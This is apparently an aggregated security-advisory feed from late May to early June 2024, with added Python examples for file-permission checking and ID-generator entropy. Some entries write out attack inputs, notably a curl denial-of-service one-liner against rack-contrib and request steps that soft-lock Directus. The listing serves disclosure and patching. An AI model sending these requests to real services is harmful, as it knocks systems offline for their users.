28.05.2024 09:01:48 | ubuntu | [USN-6786-1] Netatalk vulnerabilities (critical) | Netatalk could allow arbitrary code execution if it receives a specially crafted input. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6786-1
28.05.2024 03:00:00 | cisa | [CISA-2024:0528] CISA Adds One Known Exploited Vulnerability to Catalog (high) | CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise. | https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0528
28.05.2024 13:19:14 | almalinux | [ALSA-2024:3339] glibc security update (important) | glibc security update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3339
28.05.2024 13:01:45 | almalinux | [ALSA-2024:3307] tomcat security and bug fix update (important) | tomcat security and bug fix update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3307
29.05.2024 19:15:10 | nginx | [NGINX:CVE-2024-32760] Buffer overwrite in HTTP/3 (medium) | When NGINX Plus or NGINX OSS are configured to use the HTTP/3 QUIC module, undisclosed HTTP/3 encoder instructions can cause NGINX worker processes to terminate or cause other potential impact. | https://secdb.nttzen.cloud/security-advisory/nginx/NGINX:CVE-2024-32760
29.05.2024 19:15:10 | nginx | [NGINX:CVE-2024-35200] NULL pointer dereference in HTTP/3 (medium) | When NGINX Plus or NGINX OSS are configured to use the HTTP/3 QUIC module, undisclosed HTTP/3 requests can cause NGINX worker processes to terminate. | https://secdb.nttzen.cloud/security-advisory/nginx/NGINX:CVE-2024-35200
29.05.2024 19:15:10 | nginx | [NGINX:CVE-2024-34161] Memory disclosure in HTTP/3 (medium) | When NGINX Plus or NGINX OSS are configured to use the HTTP/3 QUIC module and the network infrastructure supports a Maximum Transmission Unit (MTU) of 4096 or greater without fragmentation, undisclosed QUIC packets can cause NGINX worker processes to leak previously freed memory. | https://secdb.nttzen.cloud/security-advisory/nginx/NGINX:CVE-2024-34161
29.05.2024 19:15:09 | nginx | [NGINX:CVE-2024-31079] Stack overflow and use-after-free in HTTP/3 (medium) | When NGINX Plus or NGINX OSS are configured to use the HTTP/3 QUIC module, undisclosed HTTP/3 requests can cause NGINX worker processes to terminate or cause other potential impact. This attack requires that a request be specifically timed during the connection draining process, which the attacker has no visibility and limited influence over. | https://secdb.nttzen.cloud/security-advisory/nginx/NGINX:CVE-2024-31079
29.05.2024 18:38:21 | ubuntu | [USN-6799-1] Werkzeug vulnerability (high) | Werkzeug could be made to execute code under certain circumstances. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6799-1
29.05.2024 17:58:02 | ubuntu | [USN-6798-1] GStreamer Base Plugins vulnerability (high) | GStreamer Base Plugins could be made to crash or run programs as your login if it opened a specially crafted file. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6798-1
29.05.2024 16:21:53 | ubuntu | [USN-6796-1] TPM2 Software Stack vulnerabilities (medium) | Several security issues were fixed in TPM2 Software Stack. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6796-1
29.05.2024 10:13:42 | ubuntu | [USN-6797-1] Intel Microcode vulnerabilities (high) | Several security issues were fixed in Intel Microcode. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6797-1
29.05.2024 07:25:29 | ubuntu | [USN-6779-2] Firefox regressions | USN-6779-1 caused some minor regressions in Firefox. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6779-2
29.05.2024 03:00:00 | cisa | [CISA-2024:0529] CISA Adds One Known Exploited Vulnerability to Catalog (high) | CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise. | https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0529
29.05.2024 03:00:00 | debian | [DSA-5700-1] python-pymysql | security update | https://secdb.nttzen.cloud/security-advisory/debian/DSA-5700-1
29.05.2024 03:00:00 | oraclelinux | [ELSA-2024-3258] xorg-x11-server security update (moderate) | [1.20.14-23] - CVE fix for: CVE-2024-31080, CVE-2024-31081, CVE-2024-31082 and CVE-2024-31083 - Add util-linux as a dependency of Xvfb - Fix compilation error on i686 | https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3258
29.05.2024 03:00:00 | oraclelinux | [ELSA-2024-3268] krb5 security update (low) | [1.18.2-27.0.1] - Fixed race condition in krb5_set_password() [Orabug: 33609767]; [1.18.2-27] - Fix memory leak in GSSAPI interface (Resolves: RHEL-27250) - Fix memory leak in PMAP RPC interface (Resolves: RHEL-27244) - Make TCP waiting time configurable (Resolves: RHEL-17131) | https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3268
29.05.2024 03:00:00 | oraclelinux | [ELSA-2024-3270] sssd security update (moderate) | [2.9.4-3.0.1] - Restore default debug level for sss_cache [Orabug: 32810448]; [2.9.4-3] - Resolves: RHEL-27205 - Race condition during authorization leads to GPO policies functioning inconsistently | https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3270
29.05.2024 03:00:00 | oraclelinux | [ELSA-2024-3271] bind and dhcp security update (important) | bind [32:9.11.36-14] - Speed up parsing of DNS messages with many different names (CVE-2023-4408) - Prevent increased CPU consumption in DNSSEC validator (CVE-2023-50387 CVE-2023-50868) - Do not use header_prev in expire_lru_headers; dhcp [4.3.6] - Change bug tracker path; [12:4.3.6-50] - Rebuild because of bind ABI changes related to CVE-2023-50387 | https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3271
29.05.2024 03:00:00 | oraclelinux | [ELSA-2024-3261] tigervnc security update (important) | [1.13.1-10] - Drop patches that are already part of xorg-x11-server (Resolves: RHEL-30755, RHEL-30767, RHEL-30761); [1.13.1-9] - Fix CVE-2024-31080 tigervnc: xorg-x11-server: Heap buffer overread/data leakage in ProcXIGetSelectedEvents (Resolves: RHEL-30755) - Fix CVE-2024-31083 tigervnc: xorg-x11-server: Use-after-free in ProcRenderAddGlyphs (Resolves: RHEL-30767) - Fix CVE-2024-31081 tigervnc: xorg-x11-server: Heap buffer overread/data leakage in ProcXIPassiveGrabDevice (Resolves: RHEL-30761); [1.13.1-8] - Fix copy/paste error in the DeviceStateNotify (Resolves: RHEL-20530); [1.13.1-7] - Fix CVE-2024-21886 tigervnc: xorg-x11-server: heap buffer overflow in DisableDevice (Resolves: RHEL-20388) - Fix CVE-2024-21885 tigervnc: xorg-x11-server: heap buffer overflow in XISendDeviceHierarchyEvent (Resolves: RHEL-20382) - Fix CVE-2024-0229 tigervnc: xorg-x11-server: reattaching to different master device may lead to out-of-bounds memory access (Resolves: RHEL-20530) - Fix CVE-2023-6816 tigervnc: xorg-x11-server: Heap buffer overflow in DeviceFocusEvent and ProcXIQueryPointer (Resolves: RHEL-21214); [1.13.1-6] - Use dup() to get available file descriptor when using -inetd option (Resolves: RHEL-21000); [1.13.1-5] - Fix CVE-2023-6377 tigervnc: xorg-x11-server: out-of-bounds memory reads/writes in XKB button actions (Resolves: RHEL-18410) - Fix CVE-2023-6478 tigervnc: xorg-x11-server: out-of-bounds memory read in RRChangeOutputProperty and RRChangeProviderProperty (Resolves: RHEL-18422); [1.13.1-4] - Fix CVE-2023-5380 tigervnc: xorg-x11-server: Use-after-free bug in DestroyWindow (Resolves: RHEL-15236) - Fix CVE-2023-5367 tigervnc: xorg-x11-server: Out-of-bounds write in XIChangeDeviceProperty/RRChangeOutputProperty (Resolves: RHEL-15230); [1.13.1-3] - Support username alias in PlainUsers (Resolves: RHEL-4258) | https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3261
29.05.2024 03:00:00 | oraclelinux | [ELSA-2024-3275] python-dns security update (moderate) | [1.15.0-12] - Security fix for CVE-2023-29483 (Resolves: RHEL-32630) | https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3275
29.05.2024 03:00:00 | oraclelinux | [ELSA-2024-3340] .NET 7.0 security update (important) | [7.0.119-1.0.1] - Add support for Oracle Linux; [7.0.119-1] - Update to .NET SDK 7.0.119 and Runtime 7.0.19 - Resolves: RHEL-35313; [7.0.118-2] - Update to .NET SDK 7.0.118 and Runtime 7.0.18 - Resolves: RHEL-31199 | https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3340
29.05.2024 03:00:00 | oraclelinux | [ELSA-2024-3264] pcp security update (important) | [5.3.7-20.0.1] - pcp-zoneinfo fix to replay ol7 archives [Orabug: 35903733] - Backporting of python tool pcp-meminfo [Orabug: 35759707] - Backporting of python tool pcp-slabinfo [Orabug: 35560940] - Backporting of python tool pcp-buddyinfo [Orabug: 35660932] - Backporting of python tool pcp-netstat [Orabug: 34324779] - Backporting of python tool pcp-zoneinfo [Orabug: 35660927] - Fixed multiple pcp python utilities issues [Orabug: 35434363] - Fixed broken pipe issue in pcp ps utility [Orabug: 34830203] - Fixed pcp mpstat utility crash issue [Orabug: 34891338] - Pcp mpstat utility initial archive file read error fix [Orabug: 34869451] - Fix pcp-ps to show n sample with archives [Orabug: 34849959] - Pcp ps Utility -o option and print issue fix [Orabug: 34321683] - Pcp ps utility has been added [Orabug: 34321683]; [5.3.7-20] - Disable RESP proxying by default in pmproxy (RHEL-30715) | https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3264
30.05.2024 22:49:05maven[MAVEN:GHSA-VG6X-PCHQ-98MG] OpenCMS Cross-Site Scripting vulnerability (moderate)Two Cross-Site Scripting vulnerabilities have been discovered in Alkacon's OpenCMS affecting version 16, which could allow a user: with sufficient privileges to create and modify web pages through the admin panel, can execute malicious JavaScript code, after inserting code in the `title` field. Another could having the roles of gallery editor or VFS resource manager will have the permission to upload images in the .svg format containing JavaScript code. The code will be executed the moment another user accesses the image.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-VG6X-PCHQ-98MG
30.05.2024 21:34:34npm[NPM:GHSA-PMH2-WPJM-FJ45] mysql2 vulnerable to Prototype Pollution (high)Versions of the package mysql2 before 3.9.8 are vulnerable to Prototype Pollution due to improper user input sanitization passed to fields and tables when using nestTables.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-PMH2-WPJM-FJ45
30.05.2024 18:53:23ubuntu[USN-6803-1] FFmpeg vulnerabilitiesFFmpeg could be made to crash or run programs as your login if itopened a specially crafted file.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6803-1
30.05.2024 14:59:25ubuntu[USN-6802-1] PostgreSQL vulnerability (low)PostgreSQL could be made to expose sensitive information.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6802-1
30.05.2024 14:38:31ubuntu[USN-6801-1] PyMySQL vulnerabilityPyMySQL could be vulnerable to SQL injection attacks.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6801-1
30.05.2024 13:12:04ubuntu[USN-6800-1] browserify-sign vulnerability (high)browserify-sign could allow unintended access if it opened a specially craftedfile.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6800-1
30.05.2024 23:12:44almalinux[ALSA-2024:3501] nghttp2 security update (moderate)nghttp2 security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3501
30.05.2024 23:11:01almalinux[ALSA-2024:3513] less security update (important)less security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3513
30.05.2024 03:00:00cisa[CISA-2024:0530] CISA Adds 2 Known Exploited Vulnerabilities to Catalog (high)CISA has added 2 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0530
30.05.2024 03:00:00oraclelinux[ELSA-2024-3513] less security update (important)[590-4]- Fix CVE-2024-32487- Resolves: RHEL-33773https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3513
30.05.2024 03:00:00redhat[RHSA-2024:3501] nghttp2 security update (moderate)libnghttp2 is a library implementing the Hypertext Transfer Protocol version 2 (HTTP/2) protocol in C.Security Fix(es):* nghttp2: CONTINUATION frames DoS (CVE-2024-28182)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3501
30.05.2024 03:00:00redhat[RHSA-2024:3513] less security update (important)The "less" utility is a text file browser that resembles "more", but allows users to move backwards in the file as well as forwards. Since "less" does not read the entire input file at startup, it also starts more quickly than ordinary text editors. Security Fix(es): * less: OS command injection (CVE-2024-32487). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3513
30.05.2024 03:00:00redhat[RHSA-2024:3500] ruby:3.0 security update (moderate)Ruby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to perform system management tasks. Security Fix(es): * ruby/cgi-gem: HTTP response splitting in CGI (CVE-2021-33621) * ruby: ReDoS vulnerability in URI (CVE-2023-28755) * ruby: ReDoS vulnerability in Time (CVE-2023-28756) * ruby: RCE vulnerability with .rdoc_options in RDoc (CVE-2024-27281) * ruby: Buffer overread vulnerability in StringIO (CVE-2024-27280) * ruby: Arbitrary memory address read vulnerability with Regex search (CVE-2024-27282). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3500
30.05.2024 05:34:10rubysec[RUBYSEC:RACK-CONTRIB-2024-35231] Denial of Service in rack-contrib via "profiler_runs" parameter (high)
rack-contrib prior to version 2.5.0 is vulnerable to a Denial of Service via the `profiler_runs` HTTP request parameter.
Versions Affected: < 2.5.0
Fixed Versions: >= 2.5.0
# Impact
An attacker can trigger a Denial of Service by sending an HTTP request with an overly large `profiler_runs` parameter.
```shell
curl "http://127.0.0.1:9292/?profiler_runs=9999999999&profile=process_time"
```
# Releases
The fixed releases are available at the normal locations.
# Workarounds
There are no feasible workarounds for this issue.
https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:RACK-CONTRIB-2024-35231
30.05.2024 05:49:06rubysec[RUBYSEC:KAMINARI-2024-32978] Insecure File Permissions vulnerability in kaminari (medium)
kaminari versions prior to 0.16.2 are vulnerable to an Insecure File Permissions vulnerability, where certain files within the kaminari gem have insecure file permissions.
Versions Affected: < 0.16.2
Fixed Versions: >= 0.16.2
# Impact
An attacker with local access could write arbitrary code to the affected files resulting in arbitrary code execution.
# Releases
The fixed releases are available at the normal locations.
# Workarounds
Manually set the permissions of the affected files to `644`.
## All Affected Versions:
```
lib/kaminari/models/page_scope_methods.rb
```
## Version 0.15.0 and 0.15.1:
```
spec/models/mongo_mapper/mongo_mapper_spec.rb
```
## Version 0.16.0:
```
spec/models/mongo_mapper/mongo_mapper_spec.rb
spec/models/mongoid/mongoid_spec.rb
```
## Version 0.16.1:
```
spec/models/active_record/scopes_spec.rb
spec/models/mongo_mapper/mongo_mapper_spec.rb
spec/models/mongoid/mongoid_spec.rb
gemfiles/data_mapper_12.gemfile
gemfiles/active_record_32.gemfile
```
https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:KAMINARI-2024-32978
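The kaminari advisory's workaround is a chmod to `644`; the check a practitioner wants is one that finds every file under an installed gem's directory that is writable by group or others and confirms the fix took. The Python below is an added example, not kaminari's code or the advisory's text: `find_insecure_files()` walks a tree and flags regular files with group/other write bits, `fix_permissions()` applies the advisory's `0644`, and `demo_gem_tree()` builds a constructed fixture (one `0666` copy of the advisory's `lib/kaminari/models/page_scope_methods.rb` path beside a correctly permissioned file) so the example runs offline. Helper names are this example's own.

```python
"""Find and fix group/world-writable files under a directory tree.

Added example (not kaminari's code).  Run it against a real gem directory,
e.g. `find_insecure_files("/var/lib/gems/3.1.0/gems/kaminari-0.16.1")`.
"""
import os
import stat
import tempfile


def writable_by_others(path: str) -> bool:
    """True if `path` is a regular file whose mode grants write to group or other."""
    mode = os.lstat(path).st_mode          # lstat: do not follow symlinks
    return stat.S_ISREG(mode) and bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def find_insecure_files(root: str) -> list:
    """Relative paths (sorted) of regular files under `root` writable by others."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if writable_by_others(full):
                hits.append(os.path.relpath(full, root))
    return sorted(hits)


def fix_permissions(root: str, mode: int = 0o644) -> list:
    """Apply the advisory's workaround (0644) to every flagged file; returns what was fixed."""
    fixed = find_insecure_files(root)
    for rel in fixed:
        os.chmod(os.path.join(root, rel), mode)
    return fixed


def demo_gem_tree() -> str:
    """Constructed fixture: a gem-like tree with one 0666 file at the advisory's
    `lib/kaminari/models/page_scope_methods.rb` path and one 0644 file."""
    root = tempfile.mkdtemp(prefix="gem-perms-")
    os.makedirs(os.path.join(root, "lib", "kaminari", "models"))
    bad = os.path.join(root, "lib", "kaminari", "models", "page_scope_methods.rb")
    good = os.path.join(root, "lib", "kaminari.rb")
    for path in (bad, good):
        with open(path, "w") as fh:
            fh.write("# constructed fixture\n")
    os.chmod(bad, 0o666)                   # the insecure mode the advisory describes
    os.chmod(good, 0o644)
    return root


if __name__ == "__main__":
    tree = demo_gem_tree()
    print("before:", find_insecure_files(tree))
    print("fixed: ", fix_permissions(tree))
    print("after: ", find_insecure_files(tree))
```

`lstat` is deliberate: a symlink planted in the tree should not be followed into a path outside the gem, and `S_ISREG` skips it entirely.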
31.05.2024 16:34:12ubuntu[USN-6804-1] GNU C Library vulnerabilitiesSeveral security issues were fixed in GNU C Library.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6804-1
31.05.2024 03:00:00debian[DSA-5701-1] chromiumsecurity updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5701-1
31.05.2024 17:51:49almalinux[ALSA-2024:3500] ruby:3.0 security update (moderate)ruby:3.0 security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3500
31.05.2024 18:26:20almalinux[ALSA-2024:3466] python39:3.9 and python39-devel:3.9 security update (important)python39:3.9 and python39-devel:3.9 security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3466
01.06.2024 03:00:00debian[DSA-5702-1] gst-plugins-base1.0 (high)security updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5702-1
03.06.2024 01:30:03maven[MAVEN:GHSA-973X-65J7-XCF4] Decompressors can crash the JVM and leak memory content in Aircompressor (high)
### Summary
All decompressor implementations of Aircompressor (LZ4, LZO, Snappy, Zstandard) can crash the JVM for certain input, and in some cases also leak the content of other memory of the Java process (which could contain sensitive information).
### Details
When decompressing certain data, the decompressors try to access memory outside the bounds of the given byte arrays or byte buffers. Because Aircompressor uses the JDK class `sun.misc.Unsafe` to speed up memory access, no additional bounds checks are performed and this has similar security consequences as out-of-bounds access in C or C++, namely it can lead to non-deterministic behavior or crash the JVM.
Users should update to Aircompressor 0.27 or newer where these issues have been fixed.
### Impact
When decompressing data from untrusted users, this can be exploited for a denial-of-service attack by crashing the JVM, or to leak other sensitive information from the Java process.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-973X-65J7-XCF4
03.06.2024 01:29:30npm[NPM:GHSA-2P57-RM9W-GVFP] ip SSRF improper categorization in isPublic (high)The ip package through 2.0.1 for Node.js might allow SSRF because some IP addresses (such as 127.1, 01200034567, 012.1.2.3, 000:0:0000::01, and ::fFFf:127.0.0.1) are improperly categorized as globally routable via isPublic. NOTE: this issue exists because of an incomplete fix for CVE-2023-42282.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-2P57-RM9W-GVFP
02.06.2024 03:00:00debian[DSA-5703-1] linux (high)security updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5703-1
03.06.2024 01:32:11npm[NPM:GHSA-9HFW-CVF4-5X25] wangEditor was discovered to contain a cross-site scripting (XSS) vulnerability via the image upload function (moderate)There is a cross-site scripting (XSS) issue in wangEditor via the image upload function in version 4.7.11. This issue has been fixed in version 4.7.12.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-9HFW-CVF4-5X25
03.06.2024 03:00:00cisa[CISA-2024:0603] CISA Adds One Known Exploited Vulnerability to Catalog (high)CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0603
03.06.2024 03:00:00oraclelinux[ELSA-2024-3546] ruby:3.1 security, bug fix, and enhancement update (moderate)ruby [3.1.5-143]: Upgrade to Ruby 3.1.5. Resolves: RHEL-35748; Fix buffer overread vulnerability in StringIO. Resolves: RHEL-35749; Fix RCE vulnerability with .rdoc_options in RDoc. Resolves: RHEL-35750; Fix arbitrary memory address read vulnerability with Regex search. Resolves: RHEL-35751. Also updated: rubygem-abrt, rubygem-mysql2, rubygem-pghttps://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3546
03.06.2024 03:00:00redhat[RHSA-2024:3546] ruby:3.1 security, bug fix, and enhancement update (moderate)Ruby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to perform system management tasks. Security Fix(es): * ruby: RCE vulnerability with .rdoc_options in RDoc (CVE-2024-27281) * ruby: Buffer overread vulnerability in StringIO (CVE-2024-27280) * ruby: Arbitrary memory address read vulnerability with Regex search (CVE-2024-27282). For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.10 Release Notes linked from the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3546
03.06.2024 10:19:16rustsec[RUSTSEC-2024-0343] Reduced entropy due to inadequate character set usage
## Description
Affected versions of the nano-id crate incorrectly generated IDs using a reduced character set in the `nano_id::base62` and `nano_id::base58` functions. Specifically, the `base62` function used a character set of 32 symbols instead of the intended 62 symbols, and the `base58` function used a character set of 16 symbols instead of the intended 58 symbols. Additionally, the `nano_id::gen` macro is also affected when a custom character set that is not a power of 2 in size is specified.
It should be noted that `nano_id::base64` is not affected by this vulnerability.
## Impact
This can result in a significant reduction in entropy, making the generated IDs predictable and vulnerable to brute-force attacks when the IDs are used in security-sensitive contexts such as session tokens or unique identifiers.
## Patches
The flaws were corrected in commit [a9022772b2f1ce38929b5b81eccc670ac9d3ab23](https://github.com/viz-rs/nano-id/commit/a9022772b2f1ce38929b5b81eccc670ac9d3ab23) by updating the `nano_id::gen` macro to use all specified characters correctly.
## PoC
```rust
use std::collections::BTreeSet;

fn main() {
    test_base58();
    test_base62();
}

// Generate many IDs and count the distinct symbols that ever appear. A correct
// base58 generator reaches 58 symbols; an affected version reaches only 16.
fn test_base58() {
    let mut produced_symbols = BTreeSet::new();
    for _ in 0..100_000 {
        // The feed's copy of this line was garbled; the call to the crate's
        // `base58` function is restored here, and the ID length of 21 is assumed.
        let id = nano_id::base58::<21>();
        for c in id.chars() {
            produced_symbols.insert(c);
        }
    }
    println!(
        "{} symbols generated from nano_id::base58",
        produced_symbols.len()
    );
}

// Same check for base62: expect 62 symbols; an affected version reaches only 32.
fn test_base62() {
    let mut produced_symbols = BTreeSet::new();
    for _ in 0..100_000 {
        let id = nano_id::base62::<21>(); // length 21 assumed, as above
        for c in id.chars() {
            produced_symbols.insert(c);
        }
    }
    println!(
        "{} symbols generated from nano_id::base62",
        produced_symbols.len()
    );
}
```
https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0343
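The nano-id advisory states the symptom (32 of 62 and 16 of 58 symbols reachable, and any custom alphabet whose size is not a power of two affected) but not the mechanism. The Python below is an added example, not the crate's code and not the advisory's PoC: it shows the general class of bug, an alphabet index taken from random bits through a mask that does not cover the whole alphabet, so symbols above the mask are never selected. `undersized_mask()` is a constructed stand-in for the faulty mask (the crate's real expression is not on this page; 5-bit and 4-bit masks simply reproduce the reported 32 and 16 counts), while `covering_mask()` with rejection sampling is the standard correct construction. `reachable_symbols()` computes coverage exactly, `observed_symbols()` repeats the advisory's empirical check, and `entropy_bits()` turns the symbol count into the entropy loss. Alphabets and helper names are this example's own.

```python
"""Alphabet coverage of mask-based random ID generation (added example)."""
import math
import secrets

BASE62 = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
BASE58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def covering_mask(alphabet_size: int) -> int:
    """Smallest all-ones mask able to index every symbol (63 for 58 or 62)."""
    return (1 << (alphabet_size - 1).bit_length()) - 1


def undersized_mask(bits: int) -> int:
    """Constructed bug: a mask only `bits` wide, so indices stop at 2**bits - 1."""
    return (1 << bits) - 1


def reachable_symbols(alphabet: str, mask: int) -> set:
    """Symbols a masked index can ever select; needs no randomness at all."""
    return {alphabet[i] for i in range(min(mask + 1, len(alphabet)))}


def gen_id(alphabet: str, length: int, mask: int, randbits=secrets.randbits) -> str:
    """Rejection sampling: draw a mask-wide value and keep it only if it is a
    valid index.  Uniform when `mask` covers the alphabet; with an undersized
    mask the loop still terminates but the upper symbols are never produced."""
    width = mask.bit_length()
    out = []
    while len(out) < length:
        index = randbits(width) & mask
        if index < len(alphabet):
            out.append(alphabet[index])
    return "".join(out)


def observed_symbols(alphabet: str, mask: int, ids: int = 5000, length: int = 21,
                     randbits=secrets.randbits) -> set:
    """Empirical check in the spirit of the advisory's PoC: the set of symbols
    that actually appear across many generated IDs."""
    seen = set()
    for _ in range(ids):
        seen.update(gen_id(alphabet, length, mask, randbits))
    return seen


def entropy_bits(symbol_count: int, length: int) -> float:
    """Entropy of an ID of `length` symbols drawn uniformly from `symbol_count`."""
    return length * math.log2(symbol_count)


if __name__ == "__main__":
    for name, alphabet, bad_bits in (("base62", BASE62, 5), ("base58", BASE58, 4)):
        bad, good = undersized_mask(bad_bits), covering_mask(len(alphabet))
        n_bad = len(observed_symbols(alphabet, bad))
        n_good = len(observed_symbols(alphabet, good))
        print(f"{name}: mask {bad:#04x} reaches {n_bad} symbols "
              f"({entropy_bits(n_bad, 21):.1f} bits per 21-char ID); "
              f"mask {good:#04x} reaches {n_good} ({entropy_bits(n_good, 21):.1f} bits)")
```

The practical takeaway for reviewing any ID or token generator: the mask must be at least `next_power_of_two(len(alphabet)) - 1`, and out-of-range draws must be rejected rather than reduced with a modulo (which would bias the low symbols instead of dropping the high ones).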
03.06.2024 15:25:41rubysec[RUBYSEC:ACTIVEADMIN-2024-37031] activeadmin vulnerable to stored persistent cross-site scripting (XSS) in dynamic form legends (high)
### Impact
Users setting their Active Admin form legends dynamically may be vulnerable to stored XSS, as long as the legend's value can be injected directly by a malicious user.
For example:
* A public web application allows users to create entities with arbitrary names.
* Active Admin is used to administrate these entities through a private backend.
* The form to edit these entities in the private backend has the following shape (note the dynamic `name` value dependent on an attribute of the `resource`):
```ruby
form do |f|
  f.inputs name: resource.name do
    f.input :name
    f.input :description
  end
  f.actions
end
```
Then a malicious user could create an entity with a payload that would get executed in the Active Admin administrator's browser.
Both `form` blocks with an implicit or explicit name (i.e., both `form resource.name` and `form name: resource.name`) suffer from the problem when the value of the name can be arbitrarily set by non-admin users.
### Patches
The problem has been fixed in ActiveAdmin 3.2.2 and ActiveAdmin 4.0.0.beta7.
### Workarounds
Users can work around this problem without upgrading by explicitly escaping the form name using an HTML escaping utility. For example:
```ruby
form do |f|
  f.inputs name: ERB::Util.html_escape(resource.name) do
    f.input :name
    f.input :description
  end
  f.actions
end
```
Upgrading is of course recommended though.
### References
https://owasp.org/www-community/attacks/xss/#stored-xss-attacks
https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:ACTIVEADMIN-2024-37031
04.06.2024 03:38:13npm[NPM:GHSA-9HFW-CVF4-5X25] wangEditor was discovered to contain a cross-site scripting (XSS) vulnerability via the image upload function (moderate)There is a cross-site scripting (XSS) issue in wangEditor via the image upload function in version 4.7.11. This issue has been fixed in version 4.7.12.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-9HFW-CVF4-5X25
05.06.2024 01:25:15go[GO-2024-2887] Unexpected behavior from Is methods for IPv4-mapped IPv6 addresses in net/netipThe various Is methods (IsPrivate, IsLoopback, etc.) did not work as expected for IPv4-mapped IPv6 addresses, returning false for addresses which would return true in their traditional IPv4 forms.https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2887
05.06.2024 01:25:15go[GO-2024-2888] Mishandling of corrupt central directory record in archive/zipThe archive/zip package's handling of certain types of invalid zip files differs from the behavior of most zip implementations. This misalignment could be exploited to create a zip file with contents that vary depending on the implementation reading the file. The archive/zip package now rejects files containing these errors.https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2888
04.06.2024 20:53:30npm[NPM:GHSA-632P-P495-25M5] Directus is soft-locked by providing a string value to random string util (high)
### Describe the Bug
Providing a non-numeric length value to the random string generation utility will create a memory issue breaking the capability to generate random strings platform wide. This creates a denial of service situation where logged in sessions can no longer be refreshed as sessions depend on the capability to generate a random session ID.
### To Reproduce
1. Test if the endpoint is working and accessible, `GET http://localhost:8055/utils/random/string`
2. Do a bad request `GET http://localhost:8055/utils/random/string?length=foo`
3. After this all calls to `GET http://localhost:8055/utils/random/string` will return an empty string instead of a random string
4. In this error situation you'll see authentication refreshes fail for the app and api.
### Impact
This counts as an unauthenticated denial of service attack vector so this impacts all unpatched instances reachable over the internet.
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-632P-P495-25M5
